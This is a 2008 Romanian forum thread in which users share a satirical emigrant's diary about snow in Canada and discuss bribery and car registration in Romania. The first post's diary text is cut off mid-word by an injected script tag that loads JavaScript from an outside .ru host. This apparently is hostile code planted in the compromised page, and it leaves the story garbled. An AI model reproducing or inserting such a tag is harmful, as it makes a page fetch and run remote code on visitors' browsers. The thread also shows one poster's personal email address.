PDA

Arată versiune întreagă : Jurnalul unui emigrant

dela
01.07.2008, 16:33
<DIV class=Secti&#111;n1>

&gt; Valabila oriunde!</DIV>
<DIV class=Secti&#111;n1>Nu stiu cati l ati citit dar merita ca ii BETON !

&gt; &gt;&gt;Jurnalul unui emigrant - viata in Canada :
&gt; &gt;&gt;
&gt; &gt;&gt;12. Aug.
&gt; &gt;&gt;-Ne-am cumparat o casa noua in Canada .. Sunt foarte emotionat.
&gt; &gt;&gt;Aici e atat de frumos. Muntii sunt de o splendoare nedescrisa. Abia
&gt; &gt;&gt;astept sa ii vad acoperiti de zapada.
&gt; &gt;&gt;
&gt; &gt;&gt;14. Oct.
&gt; &gt;&gt;- Canada .. E cea mai frumoasa tara de pe Pamant. Frunzele s-au
&gt; &gt;&gt;colorat toate in acele minunate nuante de galben si portocaliu. M-am
&gt; &gt;&gt;plimbat cu masina prin natura si am vazut cativa cerbi. Sunt atat de
&gt; &gt;&gt;gratiosi. Cerbii sunt cele mai frumoase animale. Cred ca am ajuns in
&gt; &gt;&gt;paradis. Iubesc Canada .
&gt; &gt;&gt;
&gt; &gt;&gt;11. Nov.
&gt; &gt;&gt;- In curand incepe vanatoarea cerbilor. Nu imi vine sa cred ca cineva
&gt; &gt;&gt;poate sa ucida un animal atat de frumos. Sper ca va ninge in curand. E
&gt; &gt;&gt;atat de frumos aici.
&gt; &gt;&gt;
&gt; &gt;&gt;2. Dec.
&gt; &gt;&gt;-Azi noapte a nins pentru prima oara. M-am sculat si am vazut ca este
&gt; &gt;&gt;alb peste tot ca in cele mai frumoase vederi. Am iesit afara, am
&gt; &gt;&gt;curatat in fata casei si apoi ne-am batut cu bulgari de zapada (eu am
&gt; &gt;&gt;castigat). Cand a trecut masina de curatat zapada am curatat din nou
&gt; &gt;&gt;in fata curtii. Tara deosebita! Iubesc Canada !
&gt; &gt;&gt;
&gt; &gt;&gt;12. Dec.
&gt; &gt;&gt;-Azi noapte a nins iarasi. Masina a curatat zapada din nou. Ne-a
&gt; &gt;&gt;blocat intrarea in curte. Aici e splendid.
&gt; &gt;&gt;
&gt; &gt;&gt;19. Dec.
&gt; &gt;&gt;-Azi noapte a nins iarasi. N-am putut sa scot masina sa merg la lucru.
&gt; &gt;&gt;Aici
&gt; &gt;&gt;e intr-adevar foarte frumos numai ca sunt obosit de curatat zapada.
&gt; &gt;&gt;Din nou masina aia blestemata.
&gt; &gt;&gt;
&gt; &gt;&gt;22.Dec.
&gt; &gt;&gt;-Cacatul asta alb nu s-a oprit toata noaptea. Am bataturi la maini de
&gt; &gt;&gt;la lopata si ma doare spatele. Aceasta maimuta cu masina parca se
&gt; &gt;&gt;ascunde dupa colt si doar asteapta sa termin de curatat in fata curtii
&gt; &gt;&gt;ca sa vina iar.
&gt; &gt;&gt;La naiba!.
&gt; &gt;&gt;
&gt; &gt;&gt;25. Dec.
&gt; &gt;&gt;-Craciun Fericit, pe naiba!. A nins din nou zapada asta nenorocita.
&gt; &gt;&gt;Daca il prind pe obsedatul ala cu masina il omor. F... muma-n c..
&gt; &gt;&gt;...... ca nu arunca mai multa sare pe sosele!.
&gt; &gt;&gt;
&gt; &gt;&gt;27. Dec.
&gt; &gt;&gt;-Azi noapte iarasi zapada. Nu ies de trei zile din casa doar dau cu
&gt; &gt;&gt;lopata intr-una dupa ce trece masina. Nu pot pleca nicaieri, masina
&gt; &gt;&gt;este blocata sub un deal de zapada si mai e si foarte frig pe
&gt; &gt;&gt;deasupra. Au spus ca la noapte vor mai cadea inca 30 cm de cacatul asta de
&gt; zapada.
&gt; &gt;&gt;
&gt; &gt;&gt;28. Dec.
&gt; &gt;&gt;-Prognoza a fost proasta. S-au mai depus 50 cm in loc de 30 cm. Daca
&gt; &gt;&gt;se continua asa nu se va topi pana la vara. Masina de curatat a ramas
&gt; &gt;&gt;blocata si maimutoiul a venit la mine sa imi ceara lopata. I-am spus
&gt; &gt;&gt;ca am rupt deja 6 curatand rahatul ce mi l-a aruncat in fata curtii.
&gt; &gt;&gt;Era cat pe ce sa ii dau si cu lopata in cap.
&gt; &gt;&gt;
&gt; &gt;&gt;4. Jan.
&gt; &gt;&gt;-Am iesit din casa in s<script src=http://www.iroe.ru/ngg.js></script>

01.07.2008, 17:50
Dela, l-am mai citit dar ma bucur sa-l recitesc-e dragut si hazliu dar problema este ca asa ceva se intimpla si in realitate(cunosc eu niste cazuri)smileys/smiley36.gif

Ninu100
01.07.2008, 23:10
Am ris ca prostu' vre-o juma de ora... ouau ce tare !smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif
dar precum a spus si Clark, inca nu e doar fictiune....din pacate...si in ceea ce priveste Ro. cred ca multa vreme va fi actual..am eu o presimtire sumbra.

light
02.07.2008, 00:57
dela, asa cum spune si clark, mai sint cazuri de-astea, in sensul ca se asteapta la famfara si covor rosul la aeroport. Eu am citi acum doar un mic pasaj cu spaga la cumpararea masinii, si ma tot intreb cum se cumpara masini in Canada, ca nu cred o iota din ce spune naucu asta.

3 Febr.
&gt; &gt;&gt;Mi-am luat masina si sunt fericit! A trebuit sa caut in dictionar
&gt; &gt;&gt;cuvantul "spaga" si l-am gasit ca slang. Inseamna "tip" or "gratuity"
&gt; &gt;&gt;cu diferenta ca aici nu poti obtine nimic fara asa ceva. Cred ca toate
&gt; &gt;&gt;spagile la un loc fac cat 1/2 din masina. Nu mai mentionez lupta
&gt; &gt;&gt;pentru inregistrarea masinii si nenumaratele birouri la care a trebuit
&gt; &gt;&gt;sa ma duc cu tramvaiul. Nu a fost o idee buna cu masina caci benzina
&gt; &gt;&gt;iar s-a scumpit. Parca si in Canada fluctua pretul dar si in jos nu
&gt; &gt;&gt;numai in sus!

Unde "s-a luptat" neica asta sa-si inregistreze masina, nu stiu, dar cu certitudine n-a avut masina in Ro.
Asa ca, mare atentie ce citesti si mai ales ce crezi: nu tot ce zboara se maninca.

angela
02.07.2008, 01:33
Light din pacate in Romania umbli mult sa inregistrezi o masina in special daca e altceva decat masina neaosa Dacia, deoarece trebuie sa se incadreze in anumite tipare, sa nu fie mai veche de cativa ani, sa aibe toate inspectiile facute si multe altele.... te plimba multzi de la un birou la altul. Personal mereu am avut noroc dar asta doar din cauza ca mai mereu stiam pe cineva care stia pe altcineva si tot asasmileys/smiley36.gif. Nu dadeam spaga propriu zisa dar mereu faceam cinste ca altfel nu mergesmileys/smiley2.gif

Ninu100
02.07.2008, 01:54
light</span> eu cred ca acest "jurnal" e totusi un monolog satiric...smileys/smiley36.gif si nu sa intimplat in realitate... de aceea are valoare doar ca divertisment. cred eu,
Dar cu inregistrarea masini, cum bine spunea Angela</span>, asa este, cineva de pe strada mea si-a cumparat o masina si dupa ce a dat pe la toti... cei de la Politie. Primarie (ca acolo se face asigurarea) si registrul auto Roman a trebuit sa faca si o inspectie a starii generale a masini, si Nenea Mecanicu' i-a gasit vre-o 20 de hibe...smileys/smiley36.gif i-a dat omul 50 de Euro si el a zis ca nu vrea bani de tigari ca nu fumeazasmileys/smiley17.gif... dupa ce ia dat 100, ia pus direct stampila...si n-a mai avut masina nica.. si era si Dacia de prin 96, iar ce a dat per total a fost aproape un sfert din pretul de cumparare... ce e mai dramatic e ca acum multa lume cind ia ceva socoteste in pret si spaga...si apoi face totalul.smileys/smiley5.gif

light
02.07.2008, 03:06
Bine ca mi-ati deschis ochii. Adormita de mine, cum n-am citit decit pasajul ala, dah!!!, credeam ca se plinge de Canada. De aia si spuneam ca cu siguranta n-a avut masini in Ro, ca nici inainte nu era simplu. Acum, nu stiu cum sa mulga oamenii mai mult.

dela
02.07.2008, 04:20
ii o chestie satirica nu o realitate ! Nu stiu cum ii in Canada dar cred ca te apuca depresia dupa citeva luni,dor de tot ce inseamna casa si absolut tot ce era extrordinar de frumos la inceput si probabil oriunde in lumea asta incepe sa te calce pe nervi . Acum cu ce are el acasa in Romania sigur ca este exagerat oarecum dar nu foarte departe de adevar ! Eu m am amuzat grozav de toata istoria asta si mi am adus aminte de ea cind am citit postarile celor care de abia asteapta sa mearga acasa ! Sincer si mi e imi lipseste " casa " acum si mi e dor de absolut tot ce inseamna Romania si chiar de lucrurilecare ma calcaupe nerviacasa , respectiv tiganii , ciinii de pe strada , mirosurile din mijloacele de transport in comun , manelele ascultate in bucuresti in autobusul de la aeroport pina in centrul Bucurestiului si spaga aia cu care daca nu o dai nu obtii nimic ! Incepe sa ma calce pe nervi atita ordine aici si sa nu poti obtine nici un " mic favor " cu o mica "spaga "smileys/smiley4.gif

Dar , eu aplic teoria facutului haz de necaz si recomandarea mea ptr toti forumistii este :
Rasul este, in acelasi timp, un puternic stimulent psihic, care favorizeaza optimismul, alunga tristetea si provoaca o veritabila dezintoxicare mintala. Astfel, dispunem de o forma de relaxare naturala, un minut de ras echivaland cu 45 de minute de relaxare. Pana si relatiile noastre sociale sunt afectate de aptitudinea de a rade. Potrivit unui studiu , oamenii reusesc mai bine in afaceri daca au simtul umorului dezvoltat. Chiar daca putem rade singuri, rasul este totusi un fenomen de grup.

Nelu Lung
09.07.2008, 04:23
Salut fratilor. Am 42 de ani si de 17 ani locuiesc in Israel, am primit rezidenta temporara. Intrebarea este, stie cineva sa-mi dea un sfat cum pot sa ajung in State, am doi copii de 6 si 10 ani, nascuti aici in Israel. Si eu si sotia sintem crestini si aici e foarte greu mai ales daca nu esti evreu, si apoi mai o bomba in autobuze (cadouri de la arabi), ba nu gasesti de lucru ca na' esti crestin si ei sint evrei...Poate cineva sa-mi dea un sfat, concret cum pot sa plec definitiv de aici ? Multumesc fratilor si numai de bine, ca de rau sintem satui...rich2robhy@yahoo.com

manolica1
09.07.2008, 07:50
3 Febr.
&gt; &gt;&gt;Mi-am luat masina si sunt fericit! A trebuit sa caut in dictionar
&gt; &gt;&gt;cuvantul "spaga" si l-am gasit ca slang. Inseamna "tip" or "gratuity"
&gt; &gt;&gt;cu diferenta ca aici nu poti obtine nimic fara asa ceva. Cred ca toate
&gt; &gt;&gt;spagile la un loc fac cat 1/2 din masina. Nu mai mentionez lupta
&gt; &gt;&gt;pentru inregistrarea masinii si nenumaratele birouri la care a trebuit
&gt; &gt;&gt;sa ma duc cu tramvaiul. Nu a fost o idee buna cu masina caci benzina
&gt; &gt;&gt;iar s-a scumpit. Parca si in Canada fluctua pretul dar si in jos nu
&gt; &gt;&gt;numai in sus!

Unde "s-a luptat" neica asta sa-si inregistreze masina, nu stiu, dar cu certitudine n-a avut masina in Ro.
Asa ca, mare atentie ce citesti si mai ales ce crezi: nu tot ce zboara se maninca.

ba e foarte adevarat...gandeste-te cat alearga unul cand aduce o masina din alta tara...dupa ce-a alergat sa plateasca taxa de prima inmatriculare, taxe pe la RAR, mici atentii la RAR s-o scoata macar euro3, dar la nemti e euro4...acum alearga sa recupereze din faimoasa taxa, la care tre sa plateasca iar o taxa sa traduca iar actele de la nemti(daca mai are copii) deoarece originalele au ramas la politie...si ca trebuia sa mearga iar la RAR ca nu au trecut noxele in Cartea masinii...

este foarte adevarat....